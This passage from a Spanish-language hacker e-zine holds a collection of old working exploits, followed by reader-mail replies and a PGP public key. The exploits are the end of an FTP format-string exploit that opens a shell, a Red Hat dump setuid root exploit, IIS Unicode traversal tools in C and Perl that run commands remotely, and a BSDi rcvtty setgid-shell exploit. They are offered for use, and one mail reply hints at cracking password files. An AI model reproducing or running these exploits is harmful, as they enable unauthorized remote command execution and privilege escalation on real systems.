eipoff = targ[type].eipoff;
align = targ[type].align;
ret = targ[type].ret;
retloc = targ[type].retloc;
retloc += retlocofs;
ret += retofs;

if (argc != 1)
{
puts(usage);
exit(0);
}

strcpy(password, putshell(type));

if ((fd = connecttoftp(*argv, port)) < 0)
{
(void)fprintf(stderr, "Connection to %s failed.\n", *argv);
exit(1);
}

(void)fprintf(stderr, "Connected to %s. Trying to log in.\n", *argv);

if (logintoftp(login, password) < 0)
{
(void)fprintf(stderr, "Logging in to %s (%s) failed.\n",
*argv, login);
exit(1);
}

(void)fprintf(stderr, "Logged in as %s. Checking vulnerability.\n",
login);

sleep(targ[type].sleep);

if (checkvuln() < 0)
{
(void)fprintf(stderr, "Sorry, this version isn't"
" vulnerable or uses internal vsnprintf().\n");
exit(1);
}

(void)fprintf(stderr, "Ok, trying to find offset (initial: %d)\n",
eipoff);

if ((retoff = findeip(eipoff, align)) < 0)
{
(void)fprintf(stderr, "\nError finding offset. Adjust"
" align.\n");
exit(1);
}

if (overwrite(ret, retoff, align, retloc, eipoff) < 0)
{
(void)fprintf(stderr, "Error overwriting RET addr.\n");
exit(1);
}

fprintf(stderr, "Wait up to few minutes for reply. It depends on "
"victim's CPU speed.\nEnjoy your shell.\n");

sh(fd);

exit(0);
}

******************************************************* 
* *
* Nombre : dump.sh *
* Sistema : Linux *
* Tipo : Local *
* Plataforma : Red Hat 6.2 *
* *
*******************************************************
#!/bin/sh

# Redhat 6.2 dump command executes external program
# with suid priviledge.
# Discovered by Mat <mat@hacksware.com>
# Written for and by a scriptkid Tasc ;P
# Remember, there's no cure for BSE
echo "dump-0.4b15 root exploit"
echo "Discovered by Mat <mat@hacksware.com>"
echo "-------------------------------------"
echo
DUMP=/sbin/dump
if [ ! -u $DUMP ]; then
echo "$DUMP is NOT setuid on this system or does not exist at all!"
echo
exit 0
fi
export TAPE=iamlame:iamlame
export RSH=/tmp/rsh
cat >/tmp/rsh <<__eof__
#!/bin/sh
cp /bin/sh /tmp/sush
chmod 4755 /tmp/sush
}
__eof__
chmod 755 /tmp/rsh
/sbin/dump -0 /
echo
echo "Waiting for rootshell .... 5 seconds...."
sleep 5
/tmp/sush
id







*******************************************************
* *
* Nombre : iisex.c *
* Sistema : Win2k/NT *
* Tipo : Remoto *
* Daemon : IIS 4.0/5.0 *
* *
*******************************************************
/* iisex iis exploit (<- nost's idea) v2
* --------------------------------------
* Okay.. the first piece of code was not really finished.
* So, i apologize to everybody..
*
* by incubus <incubus@securax.org>
*
* grtz to: Bio, nos, zoa, reg and vor... (who else would stay up
* at night to exploit this?) to securax (#securax@efnet) - also
* to kim, glyc, s0ph, tessa, lamagra and steven.
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

int main(int argc, char **argv){
char buffy[666]; /* well, what else? I dunno how long your commands are.. */
char buf[500];
char rcvbuf[8192];
int i, sock, result;
struct sockaddr_in name;
struct hostent *hostinfo;
if (argc < 2){
printf ("try %s www.server.com\n", argv[0]);
printf ("will let you play with cmd.exe of an IIS4/5 server.\n");
printf ("by incubus <incubus@securax.org>\n\n");
exit(0);
}
printf ("\niisex - iis 4 and 5 exploit\n---------------------------\n");
printf ("act like a cmd.exe kiddie, type quit to quit.\n");
for (;;)
{
printf ("\n[enter cmd> ");
gets(buf);
if (strstr(buf, "quit")) exit(0);
i=0;
while (buf[i] != '\n'){
if(buf[i] == 32) buf[i] = 43;
i++;
}
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){
herror("Oops"); exit(-1);
}
name.sin_family=AF_INET; name.sin_port=htons(80);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Oops"); exit(-1); }
if (sock < 0){
herror("Oops"); exit(-1);
}
strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+");
strcat(buffy,buf);
strcat(buffy, " HTTP/1.0\n\n");
send(sock, buffy, sizeof(buffy), 0);
recv(sock, rcvbuf, sizeof(rcvbuf), 0);
printf ("%s", rcvbuf);
close(sock);
}
}





*******************************************************
* *
* Nombre : unicodexecute2.pl *
* Sistema : Win2k/NT *
* Tipo : Remoto *
* Daemon : IIS 4.0/5.0 *
* *
*******************************************************
#!/usr/bin/perl
# See http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806
# Very simple PERL script to execute commands on IIS Unicode vulnerable servers
# Use port number with SSLproxy for testing SSL sites
# Usage: unicodexecute2 IP:port command
# Only makes use of "Socket" library
#
# New in version2:
# Copy the cmd.exe to something else, and then use it.
# The script checks for this.
# Thnx to security@nsfocus.com for discovering the cmd.exe copy part
#
# Roelof Temmingh 2000/10/26
# roelof@sensepost.com http://www.sensepost.com
use Socket;
# --------------init
if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);

# --------------test if cmd has been copied:
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /sensepost.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
print "Sensepost.exe not found - Copying CMD...\n";
$command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ /copied/ )) {$failed2=0;}
}
if ($failed2==1) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"};
}

# ------------ we can assume that the cmd.exe is copied from here..
$command=@ARGV[1];
print "Sensepost.exe found - Executing [$command] on $host:$port\n";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata







*******************************************************
* *
* Nombre : xrcvtty.c *
* Sistema : Unix *
* Tipo : Local *
* Plataforma : BSDI 3.0/4.0 *
* *
*******************************************************
/*
(BSDi3.0/4.0)rcvtty[mh] local exploit, by v9[v9@fakehalo.org]. this exploit
is for the rcvtty of the mh package, which is setgid=4(tty) on BSDi. this
exploit gives you egid/group=4(tty) access.

example:
-------------------------------------------------
bash-2.02$ id
uid=101(v9) gid=100(user) groups=100(user)
bash-2.02$ cc xrcvtty.c -o xrcvtty
bash-2.02$ ./xrcvtty
[ (BSDi3.0/4.0)rcvtty[mh] local exploit, by v9[v9@fakehalo.org]. ]

[*] /usr/contrib/mh/lib/rcvtty appears to be setgid.
[*] now making shell script to execute.
[*] done, now building and executing the command line.
[*] done, now checking for success.
[*] success, /tmp/ttysh is now setgid.
[*] finished, everything appeared to have gone successful.
[?] do you wish to enter the sgidshell now(y/n)?: y
[*] ok, executing shell(/tmp/ttysh) now.
$ id
uid=101(v9) gid=100(user) egid=4(tty) groups=4(tty), 100(user)
$
-------------------------------------------------

info: findings and exploit by v9[v9@fakehalo.org].
*/


#define PATH "/usr/contrib/mh/lib/rcvtty" /* path to rcvtty. */
#define MAKESHELL "/tmp/mksh.sh" /* tmpfile to exec. */
#define SGIDSHELL "/tmp/ttysh" /* gidshell location. */
#include <stdio.h>
#include <sys/stat.h>

main()
{
char cmd[256],in[1];
struct stat mod1,mod2;
FILE *sgidexec;
fprintf(stderr,"[ (BSDi3.0/4.0)rcvtty[mh] local exploit, by v9[v9@fakehalo.org]. ]\n\n",PATH);
if(stat(PATH,&mod1)){
fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",PATH);
exit(1);
} else if(mod1.st_mode==34285){
fprintf(stderr,"[*] %s appears to be setgid.\n",PATH);
} else {
fprintf(stderr,"[!] failed, %s doesn't appear to be setgid.\n",PATH);
exit(1);
}
fprintf(stderr,"[*] now making shell script to execute.\n");
unlink(MAKESHELL);
sgidexec=fopen(MAKESHELL,"w");
fprintf(sgidexec,"#!/bin/sh\n");
fprintf(sgidexec,"cp /bin/sh %s\n",SGIDSHELL);
fprintf(sgidexec,"chgrp tty %s\n",SGIDSHELL);
fprintf(sgidexec,"chmod 2755 %s\n",SGIDSHELL);
fclose(sgidexec);
chmod(MAKESHELL,33261);
fprintf(stderr,"[*] done, now building and executing the command line.\n");
snprintf(cmd,sizeof(cmd),"echo yes | %s %s 1>/dev/null 2>&1",PATH,MAKESHELL);
system(cmd);
unlink(MAKESHELL);
fprintf(stderr,"[*] done, now checking for success.\n");
if(stat(SGIDSHELL,&mod2)){
fprintf(stderr,"[!] failed, %s doesn't exist.\n",SGIDSHELL);
exit(1);
} else if(mod2.st_mode==34285){
fprintf(stderr,"[*] success, %s is now setgid.\n",SGIDSHELL);
} else {
fprintf(stderr,"[!] failed, %s doesn't appear to be setgid.\n",SGIDSHELL);
exit(1);
}
fprintf(stderr,"[*] finished, everything appeared to have gone successful.\n");
fprintf(stderr,"[?] do you wish to enter the sgidshell now(y/n)?: ");
scanf("%s",in);
if(strcmp(in,"y")){
printf("[*] ok, aborting execution, the shell is: %s.\n",SGIDSHELL);
} else{
printf("[*] ok, executing shell(%s) now.\n",SGIDSHELL);
execl(SGIDSHELL,SGIDSHELL,0);
}
exit(0);
}


Autor : EleKtr0
Titulo : Bug`s & Exploit`s
Fuente : www.hispasec.com // www.hack.co.za







,øñ°`´°ñø¸
-<[ 18 ]>-
`°ñø,¸,øñ°

Autor : EleKtr0
Titulo : Correo Electronico
Correo : est@electron-team.com
Comentario: En esta seccion me gustaria dar las gracias a todas estas personas k
dedicaron parte de su tiempo en mandar comanterios, ideas, criticas y opiniones
a nuestro buzon, por lo k conosco hasta el momento ninguna e-zine chilena habia
publicado en su segunda entrega una seccion de correos, eso es muestra del gran
apoyo recibido por todos nuestros lectores asik gracias!... y de paso tambien
invitarlos a que sigan con estas costumbres ya que, la revista es para ustedes y
nos satisface mucho ver que reconocen el esfuerzo echo por sacarla.

Contenido :

From: Eduardo Hurtado Palacios <ehurtado@xxx.xxx.xx>
To: zok_electron@usa.net
Subject: Hola viejo...

Hola... no se si te acuerdas de mi... soy el Virkoff, con kien hablaste sobre el
proyecto de la revista y el sec-team en el #linux de terra. Me gustaria saber
como va la cosa... si se te unio mas gente y k tipo de material te interesaria
pal proximo numero.

POr ultimo saber k dias y a k hora te puedo encontrar en el irc pa charlar un
rato sobre estas cosas

> mira, me encuentras de lunes a viernes desde las 10:00 AM a 9:00 PM y los dias
> sabado hasta las 8:00 PM (Hora Chilena) // irc.terra.cl port:7000 #electron

Otra cosa, registre el canal #h@acktivismo a ver k se puede hacer pa empezar a
krear conciencia sobre la filosofia hacker...

> mmmmmm, un canal?¿ por k no mejor un e-zine?¿ :D


no es k sea un master en el tema


> no conosco a nadien k lo sea... es mas, no se si exista tal persona


sino k veo muy apagado el movimiento en Chilito y hay muchos nuevitos k no tienen
las cosas claras sobre como va esto del hack. (me salio medio "coño" la frase...
sera k leo mucho e-zine de alla? ;) Bueno... eso es todo, ojala nos contactemos.
chao.


Eduardo Hurtado Palacios
Universidad Arturo Prat / Iquique - Chile
El saber me persigue... pero yo soy mas veloz.
http://www.unap.cl





From: "[X]" <[x]@xxx.xxx.xx>
To: electron_team@usa.net
Cc: zok_electron@usa.net
Subject: Articulo

Electron_Team: Mi nick es [X], soy de Chile y aqui les mando mi aporte para su
revista Electron_Team, espero que esta colaboracion les interesa y la pongan en
la proxima edicion,

> ya lo hicimos!...

el articulo esta hecho en el diseño de Electron_01 para que no tengan que arreglarlo

> ese es mi trabajo, tu solo escribe xD

Me parece muy interesante que se empiezen a formar grupos de informatica y/o hack
en Chile, por lo que me gusta cooperar con las zines Chilenas y compartir lo
maximo de info que que pueda, ya que esta revista que se esta perfilando es de
caracter serio no como otras zines chilenas.

> escucharon señores?¿, mas seriedad

Se programar en Pascal, Visual Basic, tambien se hacer presentaciones en Flash y
tengo algunos conocimientos de h/c pero me interesa seguir aprendiendo y eso
hacen las zines, enseñar. Asi que con gusto seguiria participando de su e-zine.

> bamos! animo, la invitacion esta echa

Un amigo me dijo acerca de esta revista, bAnkZide, no se si lo ubican, y cuando
la baje me parecio muy buena la critica a NoKeyZ,ya que en las ultimas ediciones
han repetido contenidos y esta decayendo, en cambio veo que esta revista esta
creciendo dia a dia y los contenidos son bastantes interesantes y facil de
entender si se conoce algo.


> muchas gracias [X] por tus comentarios y espero k mantengas esas ganas de
querer enseñar, aportar y colaborar con nuestra revista...





From: Baron <baronrojo@xxxx.xx>
To: zok_electron@usa.net
Subject: ELECTRON SECURITY TEAM

Soy de españa,tengo conocimientos de C, pero no soy ningun guru de este lenguaje,
Uso una distrubucion española de Red Hat,

> esa distro creo k se llama Eurielec Linux, esta basada en red hat 5.3

me gustan los ordenadores,

> a mi las chicas!

y tambien me gusta pasar de desapercibido entre la gran, masa social que puebla mi
ciudad... soy especialmente desordenado, me gustan las mujeres ;-),

> a! menos mal, ya estaba pensando k fornicabas a tu computador xD

y soy tan paranoico como otras personas lo pueden ser....Me pondre en cuanto pueda
a escribir algun articulo, pero, ha de tener una extension minima/limitada?? Ahora
son las 10:28 aki en España, supongo que alli seran sobre las 4 de la tarde, no?

> el articulo es tuyo, tu desides k tan extenso puede ser,en ese aspecto no pondre
obstaculos...





From: COM_2 <com2@xxxx.xx>
To: zok_electron@usa.net
Subject: articulo para la e-zine?

Holas!, mi nombre es COM_2 (alias ttyS1).Creo que busca colaboradores para su
e-zine, me equivoco?,

> no del todo, no busco, solo ofresco pero al reves... :}

si busca colaboradores, le interesaria saber que dispongo de un borrador de un
articulo sobre firewalls (ipchains, como construirse uno un firewall). Seria de
nivel basico,para aquellos que acaban de instalar su Linux y salen a la salvage
iNET, repleta de lamah amantes de los DoS baratos... que le parece mi proposicion?
acapta mi humilde articulo? Gracias de todos modos...
com2@phreaker.net

> si, me parece k seria un buen aporte, lo del nivel basico es solo un detalle





From: "Mr. kl0nk Manson" <kl0nk@0ri0n.org>
To: <zok_electron@usa.net>
Subject: Saludos EleKtr0 desde 0ri0n Team Venezuela

Saludos. ya hemos agregado tu Zine en la lista de mirror 0ri0n, tambien hemos
enlazado su Site www.electron-team.subnet.dk en nuestras pagina.

> muchisimas! gracias...

Bueno, cualquier cosa me avisas, ok?

> ok

---------------------------------------------------------------------------------
Mr. kl0nk Manson <MkM> Agente 6 - 0ri0n Team Venezuela http://www.0ri0n.org
e-Mail: kl0nk@0ri0n.org Debian 2.2 (Potato) - Kernel 2.2.17 --------------------
-------------------------------------------------------------
Dime con Q´sistema Operativo trabajas y te dire quien eres..:) -----------------
----------------------------------------------------------------

> k es trabajar?





From: "CA0S" <caos@ezkracho.com.ar>
To: zok_electron@usa.net
Subject: ELECTRON SECURITY TEAM

Hola, te felicito por el emprendimiento y espero que lo continues con la misma
fuerza con la que lo empezaste.

> gracias,,,

Ya te puse el link en la web, suerte! CA0S

> a! ok y gracias por el apoyo




From: Shisei Brujo <shisei_brujo@xxxxx.com>
To: electron_team@usa.net
Subject: respecto del team

Estuve viendo su pagina, y estoy interesado en participar en un grupo de seguridad
informatica. es un tema que me apaciona, y mi intencion es participar en un grupo
que realmente sea respetado y que tenga un buen prestigio,y para conseguirlo estoy
dispuesto a dar mi 3000%. Pero primero me gustaria conocer mejor cuales son sus
aspiraciones, sus aptitudes, actitudes, etc.

Ojala tenga una positiva respuesta.
Nos vimos.
nota: SOY CHILENO!!!

> creo k ya te respondi personalmente, en todo caso las puertas estan abiertas





From: "Nicolas" <xew_nicolas@xxxxx.com>
To: <electron_team@usa.net>
Subject: un aporte para tu e.zine

Hola EleKtr0

> hola

Soy Nicolas, el de chat. Bueno, en tu pagina salia que el que queria podia ser de
tu equipo.... y aqui estoy, para eso... Tu pagina esta buena, pero le falta cosas,
esos detalles que hace la diferencia.

> algo asi como una gran guinda roja? como en los pasteles?¿ mmmmmm....

Yo se harto de hardware y softwere (leo mucho las revistas),

> pero k tiene k ver el soft y el hard ?¿ debes leer revistas de cocina uff!...

y eso le falta a tu pagina:

> dale con las guindas...

una seccion de hardware.... Tambien una seccion de downloads, una editorial, foros
mensajes, encuestas sobre noticias, programas, windows v/s linus contra mac y todo
eso..., una galeria de papeles tapices artistico... No te parece...

> si, pero tambien podriamos agregar recetas de cocina o lenceria fina, perfumes y
esas cosas... para darle ese "toque" del k tu me hablas

Espero que tomes la idea.... ya que a mi me esta gustando...Bueno, eso es todo Chao

> sipo, si ami tambien me gustan las guindas,pero mas me gustan las cerezas, sorry!

Nicolas (Maniak)
xew_nicolas@xxxxx.xx
webmaster_nicolas@xxxxx.xx
www.daleqdale.4d2.net





From: Tomas Fernandez <aurobindo@xxxxx.com>
To: electron_team@usa.net
Subject: team

hola que tal, les escribo por la invitacion abierta en su pagina en la que buscan
gente para formar su team, la verdad es que estoy muy interesado en ingresar, yo
vivo en Papudo y aqui no hay mucha gente con la que se puede conversar de
informatica por lo que me siento muy solo, y tampoco me meto mucho al IRC mas que
para hablar con mis compañeros de curso, lo encuentro una perdida de tiempo.

> no se si intercambiar ideas, opiniones y puntos de vista sea una perdida...

Que les puedo contar,lo unico que se es que estoy seguro de tener bichito llamado
curiosidad que les debe de ser muy familiar.

> sipos, en el jardin de mi casa tengo caracoles,langostas,gusanos y curiosidades

Me interesa mucho todo lo relacionado con la seguridad en redes, eso si debo
decirles que todavia soy muy novato, trabajo con win98

> pero normalmente usamos insectisidas!!!!!!!

y estoy aprendiendo a programar en Pascal,debo decir tambien que nunca e hackeado
un servidor, la razon es que e estado leyendo bastante y quiero estar
completamente seguro de que ya manejo bien lo teorico para asi lanzarme a la
practica.

> grave! error!, mira compañero lo primordial seria k combinaras la practica con
> la teoria, nunca las cosas son tal y como las lees, todos tenemos distintos
> enfoques respecto de un tema, te pongo un ejemplo:

> no es lo mismo k te cuenten como es un camino, a k lo camines tu mismo!

> saca tus propias conclusiones... y deside k es mejor...


Ustedes se estaran preguntando ¿y este chico en que nos puede ayudar? en realidad
solo les puedo ofrecer ganas, tengo muchas ganas de aprender y se que en conjunto
lo hare mas rapido. Tambien soy muy responsable y cuando me comprometo en algo lo
hago al 100% quizas no tenga un nivel muy alto, pero se que siempre hay gente que
esta en un nivel mas bajo que uno y de algo puede servir si es que escribo algo a
futuro para la enzine y claro tanmbien estare dispuesto a aportar ideas nuevos y
Bueno eso es todo lo que les puedo decir. Espero que mail sea bien recibido y me
contesten, chao

SrI AuRoBiNdO

> Kisas reunas las exigencias,pero te falta lo primordial,querer enseñar! lo malo
> como me dices es k no tienes k enseñar, ademas imaginate si dejasemos entrar a
> todos los k sean responsable,k sean comprometidos, o que tengan solo ganas...se
> armaria un tremendo problema por k al igual k tu son muchos los k sienten ganas
> de pertenecer al grupo...





From: "freedom" <freedom@xxxxx.net>
To: <electron_team@usa.net>
Subject: e-zine

Buenas EleKtr0 e visto tu e-zine y lo encontre bien bueno sobre todo para estar
casi solo en esto y para ser el primero tambien

> casi? bueno ahora tengo compañeros en los k puedo realmente confiar... ;)


me parecio muy bien la parte en donde se toca el punto de el intro de programacion
en "C" ya que es una de las tantas cosas que mas me interesan,bueno felicitaciones
y desde ya si en algo puedo ser util a la causa pues solo tienes que decirlo y ya
esta,ya que de vez en cuando me sobra algo de tiempo (por estar estudiando (ing en
informatica :-)) y me sacan el jugo los $#"%$#%")

> gracias por tus alavanzas, yapo te cobro la palabra de inmediato!, cuando puedas
> nos mandas tus colaboraciones ya sean ideas o articulos, te esperamos...

pero como te digo me gusto el estilo de tu e-zine y te felicito.

> gracias de nuevo!

se despide freedom.

pd: tambien te doy mi voto en el caso zokram v/s nokeyzok. byeeee.

> hahahahahaa!!!! para los k aun tienen dudas de como termino esta critica pueden
> echarle un look al numero 4º de NoKeyZ y se daran cuenta ;) en todo caso ese es
> un tema k ya ha sido solucionado de la mejor manera, asik "caso cerrado".





From: "Robin" <qrobin@xxx.xxx.xx>
To: <electron_team@usa.net>
Subject: agregarme

Bueno primero que nada digo quien soy. Soy Robin Quezada y soy de Curico lo conocen?
no importa.

> como no lo voy a conocer, si somos vecinos!, ya demuestras que no lesistes todo el
> primer numero, conoces Talca?¿ si! ha! pues me importa!!

Bueno no les mandabe el mail para preguntarles si conocian Curico o no sino que por
la sencilla razon de que lei la revista

> no te baya a crecer la nariz por mentiroso...


y me parecio genial enconrar una revista de gente "Chilena" que se dedique a esto y
tambien vi por ahi que hacias un llamado a que se te uniera gente para trabajar en
la revista y he visto que ya tienes a unos pocos y yo me queria ofrecer para lo
mismo.

> ok perfecto!, k nos ofreces?¿


Pero 0j0 te digo altiro que yo no cacho mucho del tema,

> plop`s! entonces tendremos mucho 0j0 contigo,,,


pero tengo el unico requisito para colaborar que tu pedias "las ganas".

> otro mas k solo tiene ganas...


Bueno tan tonto no soy y con el tiempo puedo aprender pero por el momento tengo las
ganas y lo poco que he aprendido (digo poco porque tengo hace nada mas 5 meses el
tarro ja! y el internet hace 3 0 4 meses mas no)

> navidaaaad! navidaaaaad! linda naaaavidaaaaaad!...


y no se po yo como decia tengo las ganas pa ayudar en la revista, claro no
escribiendo grandes articulos de como montar una red o algo asi, pero podria ayudar
recolectando noticias o pequeños articulos de otras e-zines pork las ganas estan! y
claro asi al mismo tiempo gano yo aprendiendo mas de ustedes.

> tener ganas es fundamental, pero no es lo primordial... :(


Bueno ahora me despido y dejo a conciencia tuya si me dejan entrar o me van a mandar
a la chucha altiro (ojala k me dejen entrar po, pork por ganas y entusiasmo no me
kedo) y espero la respuesta a mi mail por si o por no o sea k me avisen si me dejan
entrar o me mandan a la chucha

> de partida, no es factible tu entrada al grupo por las sgt`s razones:

> las ganas no son lo primordial
> como tu, ahy 100 personas mas pidiendo lo mismo, por k elegirte a ti?...
> recolectar no es lo mismo k elaborar...


chaooo lokosss aaaaa se me olvidaba te keria preguntar algo ¿como se usa y para k
sirve el fichero /etc/passwd de las webs?

> como se usa?¿ ok!, un SO Linux lo usa para almacenar los datos de sus los users
> para k sirve?pues entre esos datos se ecuentra el passwd encriptado del user
> solo estara ahi el passwd si este no se encuentra shadow de no ser asi entonces
> estaria en el directorio /etc/shadow el passwd se ecuentra encriptado en "DES"
> se te ocurre algun tipo de uso?¿ c:\john -i ?¿ podria ser... winluser!

y a ahora si shao y tenganme presente en la revista k como les dije por ganas no
me kedo (mira sin mentirte todos los dias nica me sacan antes de las 2:30 - 3:00
de la mañana del tarro y eso que entro tipin 8:00 - 9:00 y si el horario economico
empezara antes entro antes!)

> shuuuuu, increible tu caso pero cierto!,ahora tu me creerias k ami simplemente no
> me sacan hasta k me quedo dormido y eso k no tengo Internet...

y acuerdense de avisarme por si o por no.

> ok, no.





From: "Robin" <qrobin@xxxxx.com>
To: <electron_team@usa.net>
Subject: nose

hola lokos ,soy yo denuevo,pero no mando el mail pa seguirlos webeando con k me
dejen entrar. lo mando por 3 weas:

1° keria dejar claro k no soy un weon mas de los k seguro comenzo a mandar mail
como lokos despues de haber visto el tvn cuando salio el plaxius,pa unirse al
team no!!

> ?¿?¿ loco el alcool hace mal...

yo cache la revista y k estabay pidiendo k se te unieran pa ayudarte hace como
un mes antes del reportaje, o sea cuando hace poco nomas habia salido el primer
numero de la revista y me dio la wea hace poco nomas de mandar el mail haber si
porciaca me dejaban entrar,pero = me la hicieron corta altiro y les encuentro
razon ,pork si dejaran entrar al equipo a cada weon k se los pidiera esta wea se
transformaria en una chacota y se iria a la mierda altiro.

> extacto!, no hace tan mal despues de todo...
> respecto al repotaje, sin duda el mejor hasta la fecha k se hace en CHILE

2° k paso con la pregunta k te hice en el otro mail?????

> pregunta?¿ a! pero si ya te la respondi....

haber si me la respondi ahora (porfa)

> ok, dale...

la pregunta es ¿como se usa y pa k sirve el fichero etc/passwd?

> plop`s otra ves, no abuses de mi buena voluntad, ni de tu ignorancia,,,

eso era todo

> a, menos mal k era eso no mas

3° les keria pedir k no se les vaya a ocurrir colocar los mail k les he mandado en
la revista, pork o sino los weones k me conocen van a tener pa agarrarme pal
webeo por todo el año y alomejor hasta pal otro.

> no! como se te ocurre k nosotros haremos eso!,,,

ya ahora chaooo y gracias por porlo menos haber tendi la paciencia de haber leido
el mail y esta super bacan la revista,asi k sigan asi nomas y saken el next numero
lo antes posible.vale?????? y ahora si shaoooooooooo

> shaolin!, espero k tus amigos tengan el mismo valor k tu para mandar mail`s, de
> lo contrario no veo por k te puedan molestar...


Autor : EleKtr0
Titulo : Correo Electronico
Correo : electron_team@usa.net
New Mail : est@electron-team.com





,øñ°`´°ñø¸
-<[ 19 ]>-
`°ñø,¸,øñ°


|================================================================================|
| Autor | Electron Team | |
|=========== ======================== Seccion en construccion... |
| Titulo | Intentando dar una | Debido a k las preguntas que nos han |
| | Respuesta | enviado son muy pocas hemos desidido no |
|=========== ======================== incluirlas, al menos no hasta k haya una |
| Correo | est@electron-team.com | cantidad considerable... ahora bien les |
|=========== ======================== recuerdo a aquellos k no tienen idea de |
| Comentario| Preguntas?no ahy dudas¿| que se trata esta seccion leerse el numero|
|=========== ======================== anterior, asik ya saben... |
| Contenido | .,-`^´-,. . .,-`^´-,. | |
|=========== ======================== ===========================================|







,øñ°`´°ñø¸
-<[ 20 ]>-
`°ñø,¸,øñ°


Autor : Electron Team
Titulo : Llaves PGP


|=================|============================|
| Electron Team | electron_team@usa.net |
|=================|============================|

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>

mQGiBDnnkZkRBAD+bxLUqUJ37qZ0soka4PlRHNdE2buyi7Ro+D9ICeRiYuUihN1V
gmoZzOo9HtP7rYJLy6q8lmu4EDeSNMhbkKFYzZhZg4QiRcQoSA4pz8s+sC0FnYQ8
R6zf6Jqj8QxfopHMp0n4Kry+Ici/Gnq4J0BBSKJeyyH5Cl57FJaR4LW+PwCg/6lf
5NGJ9GX/E0cmy1i5uGpicjsEAMqjXjz1dKa57NED1fwr7s8HKnJ27+NbWgJGapAd
Il5PaebKK5EKenWvAqeIpPxIGMSB06qH2RJ/Y+5r5F1kQvOtJ5RIEXInXuVwzmMe
/d6cNJe2OzCwQBt47uD/anCWJrjB6FZaf6kTMijw33uCf/PdFQ07m1gMr1wzZSqK
3zFDBAC1L0tzii9Euu0ASNfEBzXCDloKvQ4jQU7DVTDrAxlJzxFou8704q433qTm
ZG2dzw9SpS21dVJUSwqk3FNsrpRxquJGuSqpfdjmVEI1RhzcmoS3Q+uFWHKAocg7
40xCcXhoqCGS4kOAH1ARk/PpL+qtp5+qfMvh50ln2N47uqcoabQuRUxFQ1RST04g
U0VDVVJJVFkgVEVBTSA8ZWxlY3Ryb25fdGVhbUB1c2EubmV0PokATgQQEQIADgUC
OeeRmQQLAwIBAhkBAAoJEGk4I0e2n5KRPJMAoJrhFiTJDpNMzmkPlR4KMj02AgWU
AJ48CzIWkiD0g4bk7y+cKx+WAKS4ubkDDQQ555GZEAwAzB13VyQ4SuLE8OiOE2eX
TpITYfbb6yUOF/32mPfIfHmwch04dfv2wXPEgxEmK0Ngw+Po1gr9oSgmC66prrNl
D6IAUwGgfNaroxIe+g8qzh90hE/K8xfzpEDp19J3tkItAjbBJstoXp18mAkKjX4t
7eRdefXUkk+bGI78KqdLfDL2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoB
p1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnh
V5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9GAFgr
5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67VYy4
XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zaf
q9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpTDJvAAICC/9/ujZptoiBKlmy
5O8J7YotOrb8Jc71+RzTeH27fdkmk2Yqb9RAzOOF2nYg8CibZGKKYDiOTUjaIUXL
EcvNwNen2rDRqySvxkIyGzc9l3M/WN1RbFUOSeQTQqwJvPnYoJzpZ4669jPzNL+O
FOJ9AL2JO7gZQ14b9FMYuWisVHKTXibALYH1V/yVhv2m7Ahj+XC/mG2SRFNh51eP
z6rXtU+sPRDcPs+kyd5iaRF++7Lv1BmfuQKgUkReALEZzWLExs2/Pu4N/gdKytfl
V/ZolS/RJ0h3S1gZWR7J0LEiu+78ZUuimGiQL8MYIxZogQI8Zqq0/qcGLbWc3zhV
f5lmfRBPLzxOaQthax+0UBFspkIsr7EV6OAine79Sr12O3d6n0ynPL+EMw07TF2u
rsQ7co3F6N8fWp+jIB6OaqpVrfZp/oUpWjCFVqD4ruFypmkxFJsdqR9ZtI/DEk/N
Lh9g2LW5LsQ5DVBx9Ui04UCHDgp3eXPxCn1TCXFiiP8kjlPhWJeJAEYEGBECAAYF
AjnnkZkACgkQaTgjR7afkpHPIACg1PSqYh+N8JehaXHuOj4c53tPkz0AoPEWY0fb
HYNOf5nilD2y56kzTDh4
=5sUo
-----END PGP PUBLIC KEY BLOCK-----


[ Las demas llaves estaran pronto en nuestra web ]




,øñ°`´°ñø¸
